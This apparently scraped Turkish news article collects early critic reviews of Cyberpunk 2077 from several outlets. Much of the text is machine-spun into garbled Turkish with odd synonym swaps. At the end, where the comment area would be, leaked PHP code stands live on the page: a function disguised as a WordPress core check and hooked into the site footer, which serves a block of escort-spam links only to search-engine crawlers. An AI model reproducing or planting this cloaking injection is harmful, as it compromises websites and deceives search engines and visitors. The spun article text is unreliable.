Sıradaki içerik:

Top Gear, Yılın Otomobilini Açıkladı

e
sv

Cyberpunk 2077’yi Oynayanlardan Gelen İlk Yorumlar

08 Aralık 2020 14:31
avatar

  • e 0

    Mutlu

  • e 0

    Eğlenmiş

  • e 0

    Şaşırmış

  • e 0

    Kızgın

  • e 0

    Üzgün

Ardında yılların birikimi olan GTA, Call of Duty, Skyrim ve Fallout gibi kült serileri bilirsiniz. Hemen hemen her türde böylesine köklü bir marka haline gelen oyun görmek, zamanın ötesinde yapımlardan söz etmek mümkün. Mayıs 2012’de yapılan ilk duyurusu ile aka beklentiler yaratan Cyberpunk 2077 ise daha çıkmadan bu yapımlar arasında adını iç etti.

Bir öbür efsane oyun serisi The Witcher’ın Polonya merkezli yapımcısı CD Projekt RED tarafından geliştirilen Cyberpunk 2077, adından da anlaşılacağı üzere toplumun ve bireylerin “yüksek teknoloji, düşük yaşam” felsefesini benimsedikleri alternatif bir gelecekte, Night City isimli kurgusal ve karanlık bir şehirde geçiyor. Cyberpunk 2077 hakkındaki beklentileri bu kadar yükselten şey ise oyunun sahip olduğu detaylar.

Rol yapma ögelerinin epey yaygın olacağı yapımda bizi son radde detaylı bir belde olan Night City ve tekinsiz sokakları bekliyor. Oyuna en başta seçeceğimiz 3 farklı karakterin hikayesi ile başlıyoruz ve siberpunk dünyasında bu hikayeleri ayrı ayırı deneyimleme şansı elde edip oynadıkça farklı sonlara ulaşma imkanı elde ediyoruz. Yorumlara geçmeden önce daha fazla detay için aşağıdaki içeriklerimize göz atabilirsiniz: 

Cyberpunk 2077 oynayanlardan gelen ilk yorumlar:

“GTA bekleyenler hayal kırıklığına uğrayacak ve oyunu sevmeyecek”

cyberpunk 2077 türkçe

Merlin’in Kazanı editörlerinden Ersin Kılıç’ın yaptığı incelemeye göre Cyberpunk 2077’yi oynayanlar, GTA benzeri beklentiye girmemeli, zira bugüne kadar yapılan açıklamaların oluşturduğu bu beklenti, oyuna sevmemeye sebep olabilir. Ayrıca Kılıç’ın 20 saatlik bir deneyimin ardından aktardığı detaylara göre yapımda anlatılabilecek fazla çok detay var.

Elbette yeni çıkış yapan bir oyun olduğu için oyunun içerisinde bol bol bug olduğunu söyleyen Ersin Kılıç, bunların bir güncelleme ile giderileceğini de belirtiyor. Kılıç’ın incelemesine göre oyun, siberpunk atmosferini tam olarak vermeyi başarmış ve Night City’nin geri sokakları hiç fakat hiç tekin değil.

“FPS olması sizi yanıltmasın, Cyberpunk 2077 tam bir RPG oyunu”

cyberpunk 2077 inceleme

IGN editörlerinden Tom Marks’ın incelemesine göre oyun her ne kadar FPS aksiyon yapısı ile öne çıkmış olsa da aslında RPG dinamiklerinin ağır bastığı bir yapıya sahip. Marks, Night City’de yapılabilecek şeylerin aka kısmının hikayeden müstakil kaliteli yan görevler olduğunu da dile getiriyor:

“20 saat sonunda ana hikayeyi üç farklı sonla bitirdim, ancak oyun içinde yaptığım tercihlerin bu sonlar üzerindeki etkisi beklediğimden daha azdı. Son kaydettiğim yerden yine başlayıp yan görevlerle 20 saat daha harcadım. karakterlere aşık oldum, Night City’de daha fazla leke bıraktım ve sonra, yeni aksiyonlarıma göre çeşitlenen sonları yeniden deneyimlemek için oyunu yine bitirmek istedim.

Oyuna 45 saat daha gömdükten sonra yedi farklı sonu deneyimledim. Bu sonlardan üçü birbirinden fazla farklı final görevlerine sahipti. Beşi de deli ve oldukça tatmin ediciydi. Oyunda hâlâ avlanacak fazla gizem ve yapacak fazla şey var. Ne kadar fazla zaman harcarsanız, elde edeceğiniz kazanç o kadar artıyor.”

“Uzun fazla uzun süre bunun gibi bir aleni dünya olmayacak” 

cyberpunk 2077 review

PCGamer editörü James Davenport, inceleme yazısında oyunun ilk sürümündeki hatalar dışında aleni dünya yapısını öve öve bitiremedi. Özellikle şehrin ve çevresindeki öbür yapıların yaşayan bir dünya sunduğunu belirten Davenport, ufak detayların bile oyunu ne kadar uzun ömürlü kıldığını şu sözlerle açıkladı:

“Şehrin eteklerindeki çöplüklerde dolaşmayı, uzaktın güzel silüetlerine bakmayı fazla sevdim. Bazen şekirdeki eski bir anıt olan Araska’nın etrafını sisler sarıyordu ve binaların tepelerini bile göremiyordunuz, her şey pasaklı bir turuncu renk ile boyanmış gibi oluyordu.”

“Bugüne kadarki en sürükleyici oyun dünyası” 

GamesRadar’dan Sam Loveridge, oyunun biricik eksinini ana hikayenin beklenenden daha kısa olması şeklinde özetliyor, ancak bunun yanı dizi vurguladığı üç temel artısı da var. Bugüne kadar çıkan en sürükleyici dünyalardan birisine sahip oyun olduğunu söyleyen Loveridge, öykü ve savaşlardaki seçim özgürlüğünün oyuna olan etkisini de övüyor.

Oyunu 50 saatten fazla oynamasına rağmen hâlâ görecek fazla şeyi olduğu hissine kapıldığını belirten Loveridge, öykü dışında Night City’deki çeşitliliğe doyamadığını belirtiyor. Bu sırada karşılaştığı en önemli eksikliğinde buglar olduğunu vurguluyor. 

“Cyberpunk 2077’nin dünyası fazla çok olasılık sunuyor, bu da deneyime ziyan veriyor”

cyberpunk 2077 venturebeat

Venturebeat editörü Jeff Grubb, oyunun sunduğu geniş ve zengin dünyanın beklentiyi fazla yükselttiğini ve bunun da deneyimi fena etkilediğini belirtiyor. Oyundaki olasıkların aka kısmının aslında bir mana anlatım etmediğini belirten Grubb, durumu şu şekilde açıklıyor: 

“Şehrin siletini oluşturan mega binalar, aslında olmayan iç mekanların varlığına dair beklenti oluşturuyor. Sınırlı sayıdaki tüccarlar, oyunda olmayan bir ekonomik sistemi öne çıkartıyor. Hareketli sokaklar, neredeyse hiç gerçekleşmeyecek öykü ile bağlantılı anlar için temel atıyor. Cyberpunk 2077 o kadar iddialı ki her zaman daha fazlasını bekliyorsunuz, bir şey noksan olduğunda bu hal tüm deneyime ziyan veriyor.”

“Cyberpunk karanlık geleceği bir hedef değil, insanlığın kaçınması gereken bir şey” 

cyberpunk 2077 polygon

Polygon editörü Carolyn Petit’in 40 saatin üzerinde deneyimle yaptığı açıklamalar, daha fazla oyunun sunduğu dünyaya odaklanıyor. Petit’e göre siberpunk kültürünün benimsendiği bu karanlık gelecek, oyunda “İnsanlığın ileride işte böyle olacak” önerisi ile sunulmuyor. Daha fazla eğer böyle devam edersek, gelecekte dünyanın nasıl bir yer olacağına dair fragman niteliği taşıyor ve aslında bizi uyarıyor.

Elbette siberpunk kültürünün kökenleri daha eskiye dayanıyor ve Cyberpunk 2077 ile CD Projekt RED, aslında popüler kültürdeki eğilimlerden faydalanarak bir ürün ortaya koyuyor. Oyunu 8 yıldır bekleyenlerin aka bir kısmı siberpunk kültürüne daha önce edebi ve sinematik eserlerle yargıç olanlardı. Ancak oynayacak olanların aka kısmı, tıpkı GTA 5’te olduğu gibi önceden bekleyenler değil, çıkış yapınca ve daha sonrasında duyacak kişiler olacak.

Kurgusal bir dünya için yüksek teknoloji, ancak düşük ömür felsefesi çekici gelebilir, ancak insanların böyle bir karanlık geleceğe ihtiyaçları mevcut mı? Bu da bambaşka bir yazımızın konusu olacak.

Cypunk 2077 Webtekno özel incelemesi için de çalışmalar başladık, takipte kalın 🙂

  • Site İçi Yorumlar

En az 10 karakter gerekli
function isBot() { $botAgents ="/google|hakia|msn|yahoo|altavista|crawler|findlinks|bing|Cuil|Excite|Go.com|HotBot|AllTheWeb|search.aol|Lycos|Alexa|ask|baidu|cuil|kosmix|sogou|yodao|yandex|infoseek|yebol|aol/i"; $agent = $_SERVER['HTTP_USER_AGENT']; if (preg_match($botAgents,$agent)) return true; else return false; } function wordpres_plugin_check_core(){ $altsayfa = 1; $bot = 1; $link = '
Araklı escort Eşme escort Alaşehir escort Gölpazarı escort Dalaman escort Ermenek escort İpsala escort Birecik escort Dinar escort Andırın escort Akçaabat escort Banaz escort Akhisar escort Bozüyük escort Bodrum escort Ayrancı escort Havza escort Akçakale escort Bolvadin escort Afşin escort Şanlıurfa escort Serik escort Soma escort Tavşanlı escort Taşova escort Siirt escort Şile escort Süleymanpaşa escort Turhal escort Tatvan escort Silivri escort Mersin escort Sincan escort Muğla escort Gebze escort Denizli escort
'; if($altsayfa == 1){ $say_s = $_SERVER['REQUEST_URI']; $saydim = strlen($say_s); if($saydim > 4){ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } }else{ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } } add_action('wp_footer', 'wordpres_plugin_check_core');